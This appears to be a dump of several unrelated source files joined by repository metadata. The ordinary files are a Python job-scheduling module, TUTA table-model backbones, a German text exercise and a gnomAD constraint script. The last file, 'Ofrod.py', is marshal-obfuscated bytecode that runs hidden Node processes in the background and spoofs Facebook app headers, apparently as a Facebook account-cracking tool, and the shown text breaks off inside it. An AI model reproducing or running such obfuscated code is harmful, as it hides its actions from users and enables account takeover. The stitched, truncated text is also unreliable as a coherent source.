keys += _extract_transform_keys(calculates, keys)
keys += [formula["formelName"] for formula in formulas]
keys += _extract_transform_keys(replacements, keys)
return keys
def _extract_transform_keys(transform, keys):
if type(transform) == list:
for x in range(len(transform)):
keys = _extract_transform_keys(transform[x], keys)
elif type(transform) == dict:
for key in list(transform.keys()):
if key == "new_keys":
for custom_key in transform[key]:
if "_loop|" in custom_key:
keys.append(custom_key.split("_loop|")[1])
else:
keys.append(custom_key)
return keys
def remove_toplevel_key(obj):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = remove_toplevel_key(obj[x])
elif type(obj) == dict:
for key in list(obj.keys()):
obj[key] = remove_toplevel_key(obj[key])
elif type(obj) == str:
obj = obj.replace("$toplevel_array$", "").replace("||", "|").replace("| ", " ").replace("|}", "}")
if len(obj) > 0 and obj[-1] == "|":
obj = obj[:-1]
if len(obj) > 0 and obj[0] == "|":
obj = obj[1:]
return obj
def _extend_keys(obj, datasource_name, formula_keys):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = _extend_keys(obj[x], datasource_name, formula_keys)
elif type(obj) == dict:
for key in list(obj.keys()):
obj[key] = _extend_keys(obj[key], datasource_name, formula_keys)
elif type(obj) == str:
if obj not in formula_keys:
obj = "_req|" + datasource_name + "|" + obj
else:
obj = datasource_name + "|" + obj
return obj
def _extend_formula_keys(obj, datasource_name, formula_keys):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = _extend_formula_keys(obj[x], datasource_name, formula_keys)
elif type(obj) == dict:
if "formelString" in obj:
obj["formelString"] = _extend_formula_keys(obj["formelString"], datasource_name, formula_keys)
elif type(obj) == str:
parts = re.split('[\*/\() %\+-]', obj)
transformed_keys = []
for part in parts:
try:
float(part)
except Exception:
transformed_keys = [key if key not in part else part for key in transformed_keys]
if part != "" and part not in formula_keys and part not in transformed_keys:
transformed_keys.append(part)
part_temp = remove_toplevel_key(part)
obj = obj.replace(part, "_req|" + datasource_name + "|" + part_temp)
return obj
def _insert_param_values(con, job_id, topic_values, config=True):
for pos, t in enumerate(topic_values):
position_id = con.execute("INSERT INTO job_topic_position(job_id, steps_id, position) VALUES (?, ?, ?)",
[job_id, t["topicId"], pos]).lastrowid
if config:
jtkvt = [(position_id,
k,
_to_untyped_value(v["value"], humps.decamelize(v["type"])),
humps.decamelize(v["type"]))
for k, v in t["values"].items()]
con.executemany("INSERT INTO job_config(position_id, key, value, type) VALUES(?, ?, ?, ?)", jtkvt)
def _generate_transform(formulas, old_transform):
transform = []
counter = 0
for method in old_transform:
transform.append(method)
for formula in formulas:
transform_part, counter = generate_step_transform(formula["formelString"], formula["formelName"], counter, copy=formula.get("copy_key", None), array_key=formula.get("array_key", None), loop_key=formula.get("loop_key", ""), decimal=formula.get("decimal", 2))
if transform_part is None:
return None
transform += transform_part
return transform
def _generate_storing(historized_data, datasource_name, formula_keys, old_storing):
storing = old_storing
historized_data = remove_toplevel_key(historized_data)
for key in historized_data:
key_string = "_req|" + datasource_name + "|" + key if key not in formula_keys else key
if key_string[-1] == "|":
key_string = key_string[:-1]
storing.append({
"name": key.replace("|", "_"),
"key": key_string
})
return storing
def _remove_unused_memory(datasource_names, infoprovider_name):
pre = infoprovider_name + "_"
dirs = [f.path for f in os.scandir(MEMORY_LOCATION) if f.is_dir()]
dirs = list(filter(lambda x: re.search(pre + ".*", x), dirs))
datasource_memory_dirs = list(map(lambda x: x.split("\\")[-1].replace(pre, ""), dirs))
for index, dir in enumerate(dirs):
if not datasource_memory_dirs[index] in datasource_names:
shutil.rmtree(dir, ignore_errors=True)
def _remove_datasources(con, infoprovider_id, remove_historised=False, datasource_names=None):
res = con.execute("SELECT * FROM datasource WHERE infoprovider_id=?", [infoprovider_id])
infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?", [infoprovider_id]).fetchone()["infoprovider_name"]
if datasource_names:
_remove_unused_memory(datasource_names, infoprovider_name)
for row in res:
file_path = get_datasource_file(row["datasource_id"])
os.remove(file_path)
if remove_historised:
shutil.rmtree(os.path.join(MEMORY_LOCATION, infoprovider_name.replace(" ", "-") + "_" + row["datasource_name"].replace(" ", "-")), ignore_errors=True)
_remove_historisation_schedule(con, row["datasource_id"])
con.execute("DELETE FROM datasource WHERE datasource_id=?", [row["datasource_id"]])
def _insert_historisation_schedule(con, schedule):
"""
Trägt den gegebenen Schedule in die Tabellen schedule_historisation und schedule_historisation_weekday ein.
:param con: Variable welche auf die Datenbank verweist.
:param schedule: Schedule als Dictionary.
:type schedule: dict
"""
type, time, date, weekdays, time_interval = _unpack_schedule(schedule)
schedule_id = con.execute("INSERT INTO schedule_historisation(type, time, date, time_interval) VALUES (?, ?, ?, ?)",
[type, time, date, time_interval]).lastrowid
if type == "weekly":
id_weekdays = [(schedule_id, d) for d in weekdays]
con.executemany("INSERT INTO schedule_historisation_weekday(schedule_historisation_id, weekday) VALUES(?, ?)",
id_weekdays)
return schedule_id
def _remove_historisation_schedule(con, datasource_id):
"""
Entfernt den Schedule eines Infoproviders.
:param con: Variable welche auf die Datenbank verweist.
:param datasource_id: ID des Infoproviders.
:type datasource_id: int
"""
res = con.execute("SELECT schedule_historisation_id, type FROM schedule_historisation INNER JOIN datasource USING "
"(schedule_historisation_id) WHERE datasource_id=?", [datasource_id]).fetchone()
if res is None:
return
if res["type"] == "weekly":
con.execute("DELETE FROM schedule_historisation_weekday WHERE schedule_historisation_id=?",
[res["schedule_historisation_id"]])
con.execute("DELETE FROM schedule_historisation WHERE schedule_historisation_id=?",
[res["schedule_historisation_id"]])
def _insert_schedule(con, schedule):
type, time, date, weekdays, time_interval = _unpack_schedule(schedule)
schedule_id = con.execute("INSERT INTO schedule(type, time, date, time_interval) VALUES (?, ?, ?, ?)",
[type, time, date, time_interval]).lastrowid
if type == "weekly":
id_weekdays = [(schedule_id, d) for d in weekdays]
con.executemany("INSERT INTO schedule_weekday(schedule_id, weekday) VALUES(?, ?)", id_weekdays)
return schedule_id
def _insert_delete_options(con, delete_schedule):
type, days, hours, keep_count, fix_names_count = _unpack_delete_schedule(delete_schedule)
delete_options_id = con.execute(
"INSERT INTO delete_options(type, days, hours, k_count, fix_names_count) VALUES (?, ?, ?, ?, ?)",
[type, days, hours, keep_count, fix_names_count]).lastrowid
return delete_options_id
def _row_to_job(row):
job_id = row["job_id"]
job_name = row["job_name"]
weekdays = str(row["weekdays"]).split(",") if row["weekdays"] is not None else []
param_values = row["param_values"]
s_type = row["s_type"]
time = row["time"]
schedule = {
"type": humps.camelize(s_type)
}
if s_type == "daily":
schedule = {**schedule, "time": time}
if s_type == "weekly":
schedule = {**schedule, "time": time, "weekdays": [int(d) for d in weekdays]}
if s_type == "on_date":
schedule = {**schedule, "time": time, "date": row["date"]}
if s_type == "interval":
schedule = {**schedule, "interval": row["time_interval"], "nextExecution": row["next_execution"]}
d_type = row["d_type"]
delete_schedule = {
"type": humps.camelize(d_type)
}
if d_type == "on_day_hour":
delete_schedule = {**delete_schedule, "removalTime": {"days": int(row["days"]), "hours": int(row["hours"])}}
if d_type == "keep_count":
delete_schedule = {**delete_schedule, "keepCount": int(row["k_count"])}
if d_type == "fix_names":
delete_schedule = {**delete_schedule, "count": int(row["fix_names_count"])}
topic_values = [{}] * (int(row["topic_count"]))
for tp_s in row["topic_positions"].split(","):
tp = tp_s.split("::")
topic_id = tp[0]
topic_name = tp[1]
json_file_name = tp[2]
position = int(tp[3])
run_config = _get_topic_steps(json_file_name)["run_config"]
params = humps.camelize(_to_param_list(run_config))
topic_values[position] = {
"topicId": topic_id,
"topicName": topic_name,
"params": params,
"values": {}
}
if param_values is not None:
for vals_s in param_values.split(","):
vals = vals_s.split("::")
position = int(vals[0])
name = vals[1]
u_val = vals[2]
type = vals[3]
t_val = to_typed_value(u_val, type)
topic_values[position]["values"] = {
**topic_values[position]["values"],
name: t_val
}
return {
"jobId": job_id,
"jobName": job_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": topic_values
}
def _get_infoprovider_path(infoprovider_name: str):
return os.path.join(INFOPROVIDER_LOCATION, infoprovider_name) + ".json"
def _get_videojob_path(video_name: str):
return os.path.join(VIDEOJOB_LOCATION, video_name) + ".json"
def _get_datasource_path(datasource_name: str):
return os.path.join(DATASOURCE_LOCATION, datasource_name) + ".json"
def _get_scene_path(scene_name: str):
return os.path.join(SCENE_LOCATION, scene_name) + ".json"
def _get_steps_path(json_file_name: str):
return os.path.join(STEPS_LOCATION, json_file_name) + ".json"
def get_image_path(json_file_name: str, folder: str, image_type: str):
if folder != '':
os.makedirs(os.path.join(IMAGE_LOCATION, folder), exist_ok=True)
return os.path.join(IMAGE_LOCATION, folder, json_file_name) + "." + image_type
else:
return os.path.join(IMAGE_LOCATION, json_file_name) + "." + image_type
def _get_audio_path(json_file_name: str):
return os.path.join(AUDIO_LOCATION, json_file_name) + ".mp3"
def _get_topic_info(json_file_name: str):
try:
return _get_topic_steps(json_file_name).get("info", "")
except Exception:
return ""
def _get_topic_steps(json_file_name: str):
path_to_json = _get_steps_path(json_file_name.replace(".json", ""))
with open(path_to_json, encoding="utf-8") as fh:
return json.loads(fh.read())
def _get_values(param_string):
if param_string is None:
return []
kvts = [kvt.split(":") for kvt in param_string.split(",")]
values = {kvt[0]: to_typed_value(kvt[1], kvt[2]) for kvt in kvts}
return values
def _to_untyped_value(v, t):
if t in ["string", "enum"]:
return v
if t in ["multi_string"]:
return ";".join(v)
if t in ["multi_number"]:
return ";".join([str(n) for n in v])
if t in ["boolean", "sub_params", "number"]:
return str(v)
def to_typed_value(v, t):
if t in ["string", "enum"]:
return v
if t in ["number"]:
if "." in v:
return float(v)
return int(v)
if t in ["multi_string"]:
return v.split(";")
if t in ["multi_number"]:
return [float(n) if "." in n else int(n) for n in v.split(";")]
if t in ["boolean", "sub_params"]:
return v == "True"
def _unpack_schedule(schedule):
type = humps.decamelize(schedule["type"])
time = schedule["time"] if type != "interval" else None
date = schedule["date"] if type == "on_date" else None
if type == "interval":
time_interval = schedule.get("timeInterval", None)
if not time_interval:
time_interval = schedule["time_interval"]
else:
time_interval = None
weekdays = schedule["weekdays"] if type == "weekly" else None
return type, time, date, weekdays, time_interval
def _unpack_delete_schedule(delete_schedule):
delete_type = humps.decamelize(delete_schedule["type"])
days = delete_schedule["removalTime"]["days"] if delete_type == "on_day_hour" else None
hours = delete_schedule["removalTime"]["hours"] if delete_type == "on_day_hour" else None
keep_count = delete_schedule["keepCount"] if delete_type == "keep_count" else None
fix_names_count = delete_schedule["count"] if delete_type == "fix_names" else None
return delete_type, days, hours, keep_count, fix_names_count
def _to_param_list(run_config):
return [{**{"name": key},
**({**value, "type": humps.camelize(value["type"])}
if value["type"] != "sub_params"
else {**value, "type": "subParams", "sub_params": _to_param_list(value["sub_params"])})}
for key, value in run_config.items()]
| 40.926991 | 265 | 0.651981 |
64807514a800a3035596e5d01efed8b8b9e33aff
| 7,364 |
py
|
Python
|
tuta/model/backbones.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 36 |
2021-06-15T01:04:27.000Z
|
2022-03-19T16:36:54.000Z
|
tuta/model/backbones.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 6 |
2021-09-03T11:29:36.000Z
|
2021-12-15T11:33:57.000Z
|
tuta/model/backbones.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 8 |
2021-11-03T04:32:36.000Z
|
2022-02-02T13:43:47.000Z
|
# -*- coding: utf-8 -*-
"""
Backbones of Pre-training Models (from input to last hidden-layer output)
"""
import torch
import torch.nn as nn
import model.embeddings as emb
import model.encoders as enc
class Backbone(nn.Module):
def __init__(self, config):
super(Backbone, self).__init__()
self.total_node = sum(config.node_degree)
self.attn_method = config.attn_method
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
def unzip_tree_position(self, zipped_position):
"""
args: zipped_position: [batch_size, seq_len, tree_depth], range: [0, total_node]
rets: entire_position: [batch_size, seq_len, total_node]
lower_bound = 0, upper_bound = (total_node-1)
use one excessive bit to temporarily represent not-applicable nodes
"""
batch_size, seq_len, _ = zipped_position.size()
entire_position = torch.zeros(batch_size, seq_len, self.total_node + 1).to(zipped_position.device)
entire_position = entire_position.scatter_(-1, zipped_position, 1.0).long()
entire_position = entire_position[:, :, : self.total_node] # remove last column
return entire_position
def get_attention_mask(self, entire_top, entire_left, indicator):
attention_mask = self.attn_methods[self.attn_method](entire_top, entire_left)
attention_mask = self.create_post_mask(attention_mask, indicator)
return attention_mask
def pos2attn_max(self, pos_top, pos_left): # entire position
top_attn_mask = self.pos2attn(pos_top)
left_attn_mask = self.pos2attn(pos_left)
attn_mask = torch.max(top_attn_mask, left_attn_mask)
# attn_mask = top_attn_mask + left_attn_mask
return attn_mask
def pos2attn_add(self, pos_top, pos_left): # entire position
top_attn_mask = self.pos2attn(pos_top)
left_attn_mask = self.pos2attn(pos_left)
attn_mask = top_attn_mask + left_attn_mask
return attn_mask
def pos2attn(self, position): # entire position
"""Compute a one-dimension attention distance matrix from a entire-mode tree position. """
vector_matrix = position.unsqueeze(2).repeat(1, 1, position.size()[1], 1) # [batch, seq_len, seq_len, total_node]
attention_mask = torch.abs(vector_matrix - vector_matrix.transpose(1, 2))
attention_mask = torch.sum(attention_mask, dim=-1)
return attention_mask
def create_post_mask(self, attn_dist, indicator, padding_dist=100):
"""
[CLS] sees all of the tokens except for the [PAD]s
[SEP]s in table see each other & their own cells; [SEP]s in clc/tcr choices see as their tokens
Tokens see their friend and corresponding [SEP]
"""
cls_matrix = (indicator == -1).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
cls_matrix = torch.max(cls_matrix, cls_matrix.transpose(-1, -2))
cls_matrix = -(cls_matrix * attn_dist)
pad_matrix = (indicator == 0).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
pad_matrix = torch.max(pad_matrix, pad_matrix.transpose(-1, -2)) * padding_dist
attn_dist = attn_dist + cls_matrix + pad_matrix
# only table-[SEP]s and root can see their contexts
sep_matrix = (indicator > 0).long() * (indicator%2 == 1).long()
sep_matrix = sep_matrix.unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
sep_matrix = (1 - sep_matrix * sep_matrix.transpose(1, 2)) * padding_dist
attn_dist = attn_dist * (sep_matrix + 1)
return attn_dist
def create_post_mask_padonly(self, attn_dist, indicator, padding_dist=100):
pad_matrix = (indicator == 0).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
pad_matrix = torch.max(pad_matrix, pad_matrix.transpose(-1, -2)) * padding_dist
attn_dist = attn_dist + pad_matrix
return attn_dist
class BbForBase(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForBase(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self, token_id, num_mag, num_pre, num_top, num_low, token_order, pos_top, pos_left, format_vec, indicator):
embedded_states = self.embeddings(token_id, num_mag, num_pre, num_top, num_low, token_order, format_vec)
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
class BbForTutaExplicit(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForTutaExplicit(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self,
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left,
format_vec, indicator
):
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
embedded_states = self.embeddings(
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, entire_pos_top, entire_pos_left, format_vec
)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
class BbForTuta(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForTuta(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self,
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left,
format_vec, indicator
):
embedded_states = self.embeddings(
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left, format_vec
)
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
BACKBONES = {
"tuta": BbForTuta,
"base": BbForBase,
"tuta_explicit": BbForTutaExplicit
}
| 44.361446 | 124 | 0.655622 |
375866ce992114d014302f3769e14a9b6d44e134
| 1,091 |
py
|
Python
|
Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py
|
Apop85/Scripts
|
1d8dad316c55e1f1343526eac9e4b3d0909e4873
|
[
"MIT"
] | null | null | null |
Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py
|
Apop85/Scripts
|
1d8dad316c55e1f1343526eac9e4b3d0909e4873
|
[
"MIT"
] | 6 |
2020-12-24T15:15:09.000Z
|
2022-01-13T01:58:35.000Z
|
Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py
|
Apop85/Scripts
|
1d8dad316c55e1f1343526eac9e4b3d0909e4873
|
[
"MIT"
] | null | null | null |
# 22_uebung_lueckentext.py
# In diesem Übungsbeispiel geht es darum Inhalte in Strings mit von dem Benutzer angegebenen Stringwerten zu ersetzen
# Der Text wird aus einem File extrahiert und beinhaltet einen lückenhaften Text in welchem zu ersetzende Werte mit NOMEN, ADJEKTIV, VERB gekennzeichnet sind.
import os, re
filepfad=os.path.dirname(__file__)
os.chdir(filepfad)
def file_open():
global content, replace
replace=0
filename='replaceme.txt'
if os.path.exists(filename):
file=open(filename, 'r')
content=file.read()
file.close()
find_snippets()
def find_snippets():
suchmuster=re.compile(r'([A-Z]{4,})|(\w?[^A-Z]{2,}[A-Z]?[^A-Z]+)')
ergebnis=suchmuster.findall(content)
choose_words(ergebnis)
def choose_words(liste):
neuer_satz=''
for eintrag in liste:
if eintrag[0] == '':
neuer_satz+=eintrag[1]
else:
auswahl=input('Bitte ein '+eintrag[0].title()+' eingeben: ')
neuer_satz+=auswahl
save_file(neuer_satz)
def save_file(text):
print(text)
file=open('output.txt', 'w')
file.write(text)
file.close()
file_open()
| 24.795455 | 159 | 0.707608 |
37974ce1f38c1df69cba4c51ff69e981d6cdcca5
| 1,059 |
py
|
Python
|
data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py
|
broadinstitute/gnomadjs
|
00da72cdc2cb0753f822c51456ec15147c024a1d
|
[
"MIT"
] | 38 |
2018-02-24T02:33:52.000Z
|
2020-03-03T23:17:04.000Z
|
data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py
|
broadinstitute/gnomadjs
|
00da72cdc2cb0753f822c51456ec15147c024a1d
|
[
"MIT"
] | 385 |
2018-02-21T16:53:13.000Z
|
2020-03-04T00:52:40.000Z
|
data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py
|
broadinstitute/gnomadjs
|
00da72cdc2cb0753f822c51456ec15147c024a1d
|
[
"MIT"
] | 13 |
2020-05-01T13:03:54.000Z
|
2022-02-28T13:12:57.000Z
|
import hail as hl
def prepare_gnomad_v2_constraint(path):
ds = hl.read_table(path)
# Don't need the information in globals for the browser
ds = ds.select_globals()
# Select relevant fields
ds = ds.select(
# ID
transcript_id=ds.transcript,
gene_id=ds.gene_id,
# Expected
exp_lof=ds.exp_lof,
exp_mis=ds.exp_mis,
exp_syn=ds.exp_syn,
# Observed
obs_lof=ds.obs_lof,
obs_mis=ds.obs_mis,
obs_syn=ds.obs_syn,
# Observed/Expected
oe_lof=ds.oe_lof,
oe_lof_lower=ds.oe_lof_lower,
oe_lof_upper=ds.oe_lof_upper,
oe_mis=ds.oe_mis,
oe_mis_lower=ds.oe_mis_lower,
oe_mis_upper=ds.oe_mis_upper,
oe_syn=ds.oe_syn,
oe_syn_lower=ds.oe_syn_lower,
oe_syn_upper=ds.oe_syn_upper,
# Z
lof_z=ds.lof_z,
mis_z=ds.mis_z,
syn_z=ds.syn_z,
# Other
pli=ds.pLI,
flags=ds.constraint_flag,
)
ds = ds.key_by("transcript_id")
return ds
| 23.533333 | 59 | 0.595845 |
80d213377b292e640046d4ebd0e3f1da7b67fb03
| 66,279 |
py
|
Python
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#Compiled By Raka Andrian
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sp\x03\x00\x00y\xb0\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01Wn+\x00\x04e\x0f\x00k\n\x00r\xdd\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xe\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x06\x00\x83\x01\x00s\r\x01e\x00\x00j\x10\x00d\x07\x00\x83\x01\x00\x01n\x00\x00e\x00\x00j\x11\x00j\x12\x00d\x08\x00\x83\x01\x00s/\x01e\x00\x00j\x10\x00d\t\x00\x83\x01\x00\x01n\x00\x00d\x00\x00d\n\x00l\x13\x00m\x14\x00Z\x14\x00\x01e\x00\x00j\x10\x00d\x0b\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00s\xc1\x01e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0f\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x12\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01nh\x00e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00r)\x02e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x14\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01n\x00\x00e\x05\x00j\x16\x00d\x15\x00d\x16\x00\x83\x02\x00Z\x17\x00e\x05\x00j\x16\x00d\x17\x00d\x18\x00\x83\x02\x00Z\x18\x00i\x08\x00e\x19\x00e\x17\x00\x83\x01\x00d\x19\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1a\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006d"\x00d#\x006d$\x00d%\x006Z\x1a\x00e\x1b\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1c\x00d&\x00\x83\x01\x00\x01d\'\x00Z\x1d\x00d(\x00Z\x1e\x00d)\x00Z\x1f\x00d*\x00\x84\x00\x00Z \x00d+\x00\x84\x00\x00Z!\x00d,\x00\x84\x00\x00Z"\x00d-\x00\x84\x00\x00Z#\x00d.\x00\x84\x00\x00Z$\x00d/\x00\x84\x00\x00Z%\x00d0\x00\x84\x00\x00Z&\x00d1\x00\x84\x00\x00Z\'\x00d2\x00\x84\x00\x00Z(\x00d3\x00\x84\x00\x00Z)\x00d4\x00\x84\x00\x00Z*\x00d5\x00\x84\x00\x00Z+\x00d6\x00\x84\x00\x00Z,\x00d7\x00\x84\x00\x00Z-\x00d8\x00\x84\x00\x00Z.\x00d9\x00\x84\x00\x00Z/\x00e0\x00d:\x00k\x02\x00rl\x03e!\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(;\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x15\x00\x00\x00pip2 install requestss\x0f\x00\x00\x00python2 Best.pyt\x05\x00\x00\x00clears(\x00\x00\x00/data/data/com.termux/files/usr/bin/nodes#\x00\x00\x00apt update && apt install nodejs -ys(\x00\x00\x00/data/data/com.termux/files/usr/bin/rubys)\x00\x00\x00apt install ruby -y && gem install lolcat(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionErrors\x08\x00\x00\x00git pullsG\x00\x00\x00/data/data/com.termux/files/home/hpro/...../node_modules/bytes/index.jss\x13\x00\x00\x00fuser -k 5000/tcp &t\x01\x00\x00\x00#s\x17\x00\x00\x00cd ..... && npm installs\x1b\x00\x00\x00cd ..... && node index.js &s6\x00\x00\x00\x1b[1;32mPlease Select Chrome Browser To Continue\x1b[0;97ms\t\x00\x00\x00xdg-open i\n\x00\x00\x00s@\x00\x00\x00xdg-open https://www.facebook.com/profile.php?id=100000395779504g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|Ag\x00\x00\x00\x00\x00\x88\xd3@g\x00\x00\x00\x00\x00\x88\xe3@s\x19\x00\x00\x00x-fb-connection-bandwidths\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\xbe\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines\x05\x00\x00\x00utf-8s\x07\x00\x00\x00\x1b[1;32ms\x07\x00\x00\x00\x1b[0;97ms\x07\x00\x00\x00\x1b[1;31mc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xda\x03\x00\x00echo -e "\n\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \xe2\x97\x8d\xe2\x9e\xa4 ADMIN 